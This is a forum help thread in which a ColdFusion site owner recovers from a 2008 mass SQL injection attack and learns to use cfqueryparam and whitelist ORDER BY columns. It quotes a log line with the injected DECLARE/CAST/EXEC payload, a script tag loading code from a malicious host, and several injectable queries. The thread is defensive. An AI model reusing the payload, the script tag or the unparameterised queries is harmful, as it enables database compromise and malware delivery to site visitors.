cadkins asked:
SQL Injection Attack - Need help please!

Hi,

We are experiencing a really bad SQL Injection attack on our webserver (we are using coldfusion). It has added the following code to many of our fields:
<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>
Can someone guide me step to step on how to get rid of this code and also make sure it doesn't happen again in the future?
This is really urgent!

Thanks :)
cadkins (asker):
Oh and this is from the IIS logs:

2008-08-08 00:13:06 192.168.80.10 GET /ah/ah_locations.cfm locationID=6';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 24.86.13.131

I deleted the ah_locations.cfm page yesterday just to see if that will help but it still finds it somehow...
HELP!
Aneesh:
DECLARE @S CHAR(4000);
SET @S=CAST(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 AS varchar(4000) )
select @s  
cadkins (asker):
Can you be a little bit more specific please? :)
ASKER CERTIFIED SOLUTION (Aneesh; members-only, not shown)
xtype values:
 99  - ntext
 35  - text
231  - nvarchar
167  - varchar
cadkins (asker):
Well, I understand that it's selecting the table names and the column names from my database, but how can I make this stop?

Thanks
SOLUTION (members-only, not shown)
cadkins (asker):
No I'm not using cfqueryparams...
Here are some examples of queries we are using
<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
    select * from employmentApplication
    where employmentApplicationID = #url.employmentApplicationID#
</cfquery>

<cfquery name="updateStatus" datasource="#Request.DataSource#">
    UPDATE employmentApplication SET
        status = 'Viewed'
    WHERE employmentApplicationID = #url.employmentApplicationID#
</cfquery>

<!---get the --->
<cfquery name="getQuestions" datasource="#Request.DataSource#">
    select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
    from empApplQuestion a, empApplicationQuestions b
    where employmentApplicationID = #url.employmentApplicationID#
    and a.empApplQuestionID = b.empApplQuestionID
</cfquery>

In every one of your queries, add cfqueryparam.

i.e.:
<cfqueryparam cfsqltype="cf_sql_varchar" value="#form.stringvalue#">

you can add htmleditformat for added protection

<cfqueryparam cfsqltype="cf_sql_varchar" value="#htmleditformat(form.stringvalue)#">
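The three queries the asker posted, rewritten with cfqueryparam. This is an added example, not one of the thread's members-only answers; it assumes employmentApplicationID is an integer column (hence cf_sql_integer), so a value such as the `6';DECLARE ...` seen in the IIS log fails type validation and never reaches SQL Server.

```coldfusion
<!--- Added example: the asker's three queries with cfqueryparam.
      Assumption: employmentApplicationID is an integer column, so the
      parameter is typed cf_sql_integer. Non-numeric input (for example
      "6';DECLARE @S ...") is rejected by ColdFusion before the query runs,
      and the value is bound as a parameter, not spliced into the SQL text. --->

<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
    select * from employmentApplication
    where employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
</cfquery>

<cfquery name="updateStatus" datasource="#Request.DataSource#">
    UPDATE employmentApplication SET
        status = 'Viewed'
    WHERE employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
</cfquery>

<cfquery name="getQuestions" datasource="#Request.DataSource#">
    select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
    from empApplQuestion a, empApplicationQuestions b
    where employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
    and a.empApplQuestionID = b.empApplQuestionID
</cfquery>
```

The literal 'Viewed' stays a literal: only values that come from user input need a parameter. For string columns use cf_sql_varchar and set maxlength to the column width.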

cadkins (asker):
So how would I rewrite the 3 queries that I showed you in the example above to include cfqueryparam?
I'm confused about what exactly I should replace with what...

Thanks
CFQUERYPARAM is your best weapon against SQL injections.
You absolutely, without any doubt, should add it to ALL your queries as soon as possible.
You will also gain a performance boost (a slight one, but over many requests it does make a difference).
Instead of using dynamic SQL, use SPs; that's the best approach.
cadkins (asker):
I think I wanna stick with sql but I'm still not sure how to use cfqueryparam...
SOLUTION (members-only, not shown)
"Is it me or are  there many such reports today???"

last 2 days actually... there's lots of reports of this...and not just cfm sites

http://isc.sans.org/diary.html
cadkins (asker):
Cool that helps :)
So once I add cfqueryparam to all the queries, will that get rid of all the scripts that have been added to many of the fields of my database? (I'm talking about <script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>)

Thanks
SOLUTION (members-only, not shown)
cadkins (asker):
I'm assuming that if I have clean backup of the database (before the attack) and I restore it that could work too right?
that would be the easiest for sure

I'd do a backup of the compromised db for forensics before you restore from the old one.
cadkins (asker):
Ok I will try that and I will let you know sometime probably Monday if it worked
Thanks!
cadkins (asker):
I'm working on changing all the queries (there are 100s of them).
If I leave the old queries in my code as a comment (using <!--- and --->) would that be a problem? I just want to make sure that if I do something wrong I can always refer back to the old queries.
So basically I'm just wondering if code in a comment can be vulnerable to a SQL injection attack.
Thanks
"if code in a comment can be vulnerable to a SQL injection attack."

no... it's a good idea actually... although I'd go back once you've verified all is working as expected and remove them at some later date... makes the code easier to read later on

cf code comments are simply removed by the parser before any processing is done.

cadkins (asker):
Thanks!
One more question. If a query has no "where" clause do I need to change anything?
For example:

<cfquery name="qryGetDataNew" datasource="#Request.DataSource#">
    select * from Incidents
    order by recordNo
</cfquery>
SOLUTION (members-only, not shown)
("where 1 = <cfqueryparam cfsqltype="cf_sql_integer" value="1"/>."

didn't know that yama .. thx for the link)
SidFishes, Check out all the other performance articles on that site. There's a good deal of stuff there.
SOLUTION (members-only, not shown)
for everyone's information

there's an additional vuln possible if you are using Order by

http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by#more
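cfqueryparam binds values, not identifiers, so it cannot protect a column name placed in ORDER BY. The following added example (not from the linked article) applies that to the thread's Incidents query: the requested sort column is looked up in a fixed list of allowed names and only the canonical name from that list is ever interpolated. The url.sortBy and url.sortDir parameters and the extra column names are assumptions.

```coldfusion
<!--- Added example: safe dynamic ORDER BY without cfqueryparam.
      Assumptions: the sort column/direction arrive as url.sortBy and
      url.sortDir, and Incidents has the columns listed below. --->
<cfset allowedSortColumns = "recordNo,dateReported,status">
<cfset sortColumn = "recordNo">  <!--- default when input is missing or not allowed --->

<cfif structKeyExists(url, "sortBy")>
    <cfset sortIndex = listFindNoCase(allowedSortColumns, url.sortBy)>
    <cfif sortIndex gt 0>
        <!--- Use the name from the list, never the raw input, so that only
              one of the three literal strings can reach the SQL text. --->
        <cfset sortColumn = listGetAt(allowedSortColumns, sortIndex)>
    </cfif>
</cfif>

<!--- Direction is likewise reduced to one of two fixed literals. --->
<cfset sortDirection = "ASC">
<cfif structKeyExists(url, "sortDir") and url.sortDir eq "DESC">
    <cfset sortDirection = "DESC">
</cfif>

<cfquery name="qryGetDataNew" datasource="#Request.DataSource#">
    select * from Incidents
    order by #sortColumn# #sortDirection#
</cfquery>
```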
cadkins (asker):
I finally modified all of the queries and now I'm testing to see if everything went well.
Most of them so far are OK, but in addition to our SQL database we are also using an Access database for a small part of our website. I get an error on the page that uses the Access database.
Does cfqueryparam work for Access?
SOLUTION (members-only, not shown)